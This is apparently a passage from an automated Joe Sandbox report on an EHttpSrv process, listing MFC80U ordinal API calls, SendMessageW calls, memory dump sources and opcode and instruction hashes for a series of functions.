                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 670edd4a2704a59cf25486175255d64e831be64b76b28695c064baecb1b0dc99
                                                                                                                • Instruction ID: 8a8ea7dbf020beaef21659d878ac0cab9a0894dbaac0e8260ea0df79ac10f160
                                                                                                                • Opcode Fuzzy Hash: 670edd4a2704a59cf25486175255d64e831be64b76b28695c064baecb1b0dc99
                                                                                                                • Instruction Fuzzy Hash: 6A81BCB16007068FD324CF98CCC0B6AB3E5EF84618F14CA2DE96687751EB79F9598B50
                                                                                                                APIs
                                                                                                                • #764.MFC80U(20462D01,FEEA6C22,?,?,00000000,?,00000000,2047F1AF,000000FF,2041A362), ref: 2041B8A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 49d2aec307422f52fe82b2fe71e12b3385d92964ee4fbef3ff57010bf33b140b
                                                                                                                • Instruction ID: 20f6c94d0eb08dde5cb7aebfb320af4f62f4f4a5db1246a92f7947175b4701a5
                                                                                                                • Opcode Fuzzy Hash: 49d2aec307422f52fe82b2fe71e12b3385d92964ee4fbef3ff57010bf33b140b
                                                                                                                • Instruction Fuzzy Hash: 7D81ADB16007058FD724DFADC8C0B26B3F5EF80644F44CA2DE56687751E739E9898B91
                                                                                                                APIs
                                                                                                                • #764.MFC80U(FFF99779,FEEA6C22,00000000,2047EED7,00000058,2047EF2F,2047CFDF,000000FF,2041C7C6,FEEA6C22,00000000,00000001,?,?,?,00000000), ref: 20418C28
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: de6f1d873d1550d11978b98a2f5e2c2c68958f76a2d773dc2fb0932f1842c0e0
                                                                                                                • Instruction ID: 1eb38eaf2c4cb0d48ea11dfeb7b39c37b0f203b6940a2b85bd8f1e0bfc1ecb8c
                                                                                                                • Opcode Fuzzy Hash: de6f1d873d1550d11978b98a2f5e2c2c68958f76a2d773dc2fb0932f1842c0e0
                                                                                                                • Instruction Fuzzy Hash: 2A71DFB1604B018FD328CF59DC81B26B7E2EBD4614F14C93DE56AC7BA0E738E9458B44
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,?,?,2042F9AA,?,?), ref: 2043047D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 2b8b3c20b7c852a384a2a6b9e1c18fd9497dba09e6326f44bdfedfe04e71fe7a
                                                                                                                • Instruction ID: 8c78ec8261826d180477a07e134413318fae3caf72c57858b2555c50dd82c17d
                                                                                                                • Opcode Fuzzy Hash: 2b8b3c20b7c852a384a2a6b9e1c18fd9497dba09e6326f44bdfedfe04e71fe7a
                                                                                                                • Instruction Fuzzy Hash: 887115B1B007058FC720CF99DCD0A6AB3E5EFD4608F24CA3DD55A87A11DA39F9158B10
                                                                                                                APIs
                                                                                                                • #764.MFC80U(00000000,FEEA6C22,?,?,00000000,?,00000000,2047F1AF,000000FF,2041F809), ref: 20420231
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 6f19b68813a202126c8553dd222ea916b0fc5c9c56ae0e22d2c2dfc31ac2c452
                                                                                                                • Instruction ID: 706fc76fea88a4328b3faa778fc8abdf52e572fd22f3af5435c2c6311841ff6c
                                                                                                                • Opcode Fuzzy Hash: 6f19b68813a202126c8553dd222ea916b0fc5c9c56ae0e22d2c2dfc31ac2c452
                                                                                                                • Instruction Fuzzy Hash: 6C71CFB1700B028FD324DFA8D985B16B3E5EF80608F04C92DEAA5C7796E67CF9448B51
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,00000000,?,00000000,2047F1AF,000000FF,2040E1FC), ref: 2040E48B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 809c24b8e00aee26526680ef55797c1e1d6843585da1861ac648f7d96777122c
                                                                                                                • Instruction ID: 6f23047bb9867296087faeac3f31555e5892dd6a1e09183eccbdc6bc59c41139
                                                                                                                • Opcode Fuzzy Hash: 809c24b8e00aee26526680ef55797c1e1d6843585da1861ac648f7d96777122c
                                                                                                                • Instruction Fuzzy Hash: 467124B16107018FC328DFAACD81B17B7EAEBA0608F44CD3DE166A7750E63DE9158B41
                                                                                                                APIs
                                                                                                                • #764.MFC80U(458BFFF9,FEEA6C22,2047EED7,00000000,00000044,2047EF1B,2047CFDF,000000FF,2041C729,FEEA6C22,00000000,00000001,?,?,?,00000000), ref: 2040D648
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 4617c6d2f57dfa1dbd70defc75ce0c9091f811c6e2ab256ae7822ace62e36467
                                                                                                                • Instruction ID: 47f74a9446ad1e2dca6a9323ce38793ef61173937e3a7c16fe38d1840842f5f4
                                                                                                                • Opcode Fuzzy Hash: 4617c6d2f57dfa1dbd70defc75ce0c9091f811c6e2ab256ae7822ace62e36467
                                                                                                                • Instruction Fuzzy Hash: E871C1B1604B018FE318CF59C881A16F7E6FF84218F54C93DE56A97761E73AE808CB50
                                                                                                                APIs
                                                                                                                • #764.MFC80U(83F0458B,FEEA6C22,2047EED7,-00000030,?,2047EF07,2047CFDF,000000FF,20418390,00000000,6FAFCF00,2041C795,FEEA6C22,00000000,00000001,?), ref: 20418818
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 83e488def0fbf84cbec5358b734d72b380ca3eb38aec3345ef1b3c280ac79953
                                                                                                                • Instruction ID: 6e108d26ab408296e2c7771dc08ab8771c68b860efb9f62d78740de083b995c1
                                                                                                                • Opcode Fuzzy Hash: 83e488def0fbf84cbec5358b734d72b380ca3eb38aec3345ef1b3c280ac79953
                                                                                                                • Instruction Fuzzy Hash: 0771F4B1A04B058FC314DF69C880B2AF7E6EF80614F54C92DE46A87B51EB3DE885CB41
                                                                                                                APIs
                                                                                                                • #764.MFC80U(FF9A6AE8,FEEA6C22,2047EED7,-00000008,?,2047EEDF,2047CFDF,000000FF,2040D500,00000000,2047EEDF,2041C6E6,FEEA6C22,00000000,00000001,?), ref: 2040D978
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 117a10ff7036d353de076ce51dc4ca9e8d4431212e94aa7aafedbf15b2ef066e
                                                                                                                • Instruction ID: 75967449d70f6e69711e089b3a87649a8cff60f4fe63acf095d80d0f0040ecd9
                                                                                                                • Opcode Fuzzy Hash: 117a10ff7036d353de076ce51dc4ca9e8d4431212e94aa7aafedbf15b2ef066e
                                                                                                                • Instruction Fuzzy Hash: 9661B3B16047058FD718DFA9C881B2AB7E2EF80614F54C92DE56687B51EB3EF909CB40
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CCED
                                                                                                                • #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CD06
                                                                                                                • #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CD1F
                                                                                                                • #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CD38
                                                                                                                • #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CDE2
                                                                                                                • #265.MFC80U(00000000,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CE19
                                                                                                                • #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CE53
                                                                                                                • #265.MFC80U(00000000,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CE93
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#265
                                                                                                                • String ID:
                                                                                                                • API String ID: 4171483331-0
                                                                                                                • Opcode ID: 202ddafeb765ee368af551cb43395fe2e284931c58a5d4b635247606cee89bb1
                                                                                                                • Instruction ID: d74fc9ed131b597ec5b893aaa673d03ed43e5dc2af2b337a9e3f9e09efffe5ec
                                                                                                                • Opcode Fuzzy Hash: 202ddafeb765ee368af551cb43395fe2e284931c58a5d4b635247606cee89bb1
                                                                                                                • Instruction Fuzzy Hash: 906194B2500204CBCB08DF69C88199AB7E7FF94640B55C979ED09AB355D739FE49CB80
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041110A
                                                                                                                • #764.MFC80U(20462D01,?,?,?,204127C5,?,20462D02), ref: 2041111A
                                                                                                                • #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041112A
                                                                                                                • #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041113A
                                                                                                                • #265.MFC80U(00000000,?,?,?,204127C5,?,20462D02), ref: 20411183
                                                                                                                • #265.MFC80U(00000000,?,?,?,204127C5,?,20462D02), ref: 204111E3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#265
                                                                                                                • String ID:
                                                                                                                • API String ID: 4171483331-0
                                                                                                                • Opcode ID: b0024c4ae3a6811a114333c3da070cb76984e76ce6f3e22c897bc08ae9efce5c
                                                                                                                • Instruction ID: f85ed80b83d1636cf1b4d5d20a0cd95768f1b4f61d958747549d995c4f053705
                                                                                                                • Opcode Fuzzy Hash: b0024c4ae3a6811a114333c3da070cb76984e76ce6f3e22c897bc08ae9efce5c
                                                                                                                • Instruction Fuzzy Hash: 8E51A1726002019BCB18CF64C8527ABB7A2EF88744F59C568ED06DF795E639EE41C7C0
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2044DC28
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044DC5D
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044DCA3
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044DCF6
                                                                                                                • #4026.MFC80U(00000280,00000000,FEEA6C22), ref: 2044DD53
                                                                                                                • #4026.MFC80U(00000281), ref: 2044DD7A
                                                                                                                  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044DDCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6751$#4026$#314
                                                                                                                • String ID:
                                                                                                                • API String ID: 2838678766-0
                                                                                                                • Opcode ID: 692cc9bb21db07b68e7811fb851dabe5d5df92b517cd9293be954f60f0aa44a1
                                                                                                                • Instruction ID: 98200cb8d907bf1af1504b7ffa4f8b20505593ed0345a61892d829ef86b1c792
                                                                                                                • Opcode Fuzzy Hash: 692cc9bb21db07b68e7811fb851dabe5d5df92b517cd9293be954f60f0aa44a1
                                                                                                                • Instruction Fuzzy Hash: EA518DB2A083019FD304CF58D881A6AB7E1FBD4620F10CA2EF99587790DB39D805CB51
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 20420B60
                                                                                                                • #2788.MFC80U(?,?,00000000), ref: 20420B74
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20420B8C
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 20420BAD
                                                                                                                • SendMessageW.USER32 ref: 20420BFE
                                                                                                                • #762.MFC80U(00000040), ref: 20420C0A
                                                                                                                • #764.MFC80U(?), ref: 20420C6B
                                                                                                                • #764.MFC80U(?), ref: 20420C84
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#764$#2788#762
                                                                                                                • String ID:
                                                                                                                • API String ID: 94826352-0
                                                                                                                • Opcode ID: 303d5266d76560b70a859dddbe5445c77b7a3256dd36d6156f144aae68344a2a
                                                                                                                • Instruction ID: cccce94efbb18c0b116a899b718fa4962595c2b7fd6ca270cb1dbf47a7686ba6
                                                                                                                • Opcode Fuzzy Hash: 303d5266d76560b70a859dddbe5445c77b7a3256dd36d6156f144aae68344a2a
                                                                                                                • Instruction Fuzzy Hash: 985106B19087449FD320CF5AC8C0A5BFBE4BB58654F908A2EF59987750D334E844CF56
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,20420B95,?,?,00000000), ref: 2040FBB7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 80f0db05304fd9d6823bb3fdc5d65254f79319c78f0f45daf2988447773be1fe
                                                                                                                • Instruction ID: 2667b74741966b4bc6b088ac4c1c2f5677e93d82a42779522c08319c34846e7a
                                                                                                                • Opcode Fuzzy Hash: 80f0db05304fd9d6823bb3fdc5d65254f79319c78f0f45daf2988447773be1fe
                                                                                                                • Instruction Fuzzy Hash: 0141D5F16047088BD3289FA5CC82B2AB3E6EB80614F54C93DE55AD7E50EA3DF8458B50
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,20431F52), ref: 20434A67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 54fc8e52c9ad11d0352c6890a50526739e071df378e0acc8d1de1216e089caed
                                                                                                                • Instruction ID: 8d2cc59dc8edb40c4a55f40b973c5f82235228e467e1daf06889393d0d2ee4c8
                                                                                                                • Opcode Fuzzy Hash: 54fc8e52c9ad11d0352c6890a50526739e071df378e0acc8d1de1216e089caed
                                                                                                                • Instruction Fuzzy Hash: 5B31D3B26007045BD3249FA5D985B5BF7EAEBD4A14FB4D83EE05AC7A90D63CF8418B10
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,20452885), ref: 20452DE7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: d9fe5cdd2b2663bd7e67fa88f134ce0ceda9424471f8b88cf63c91e175b127f5
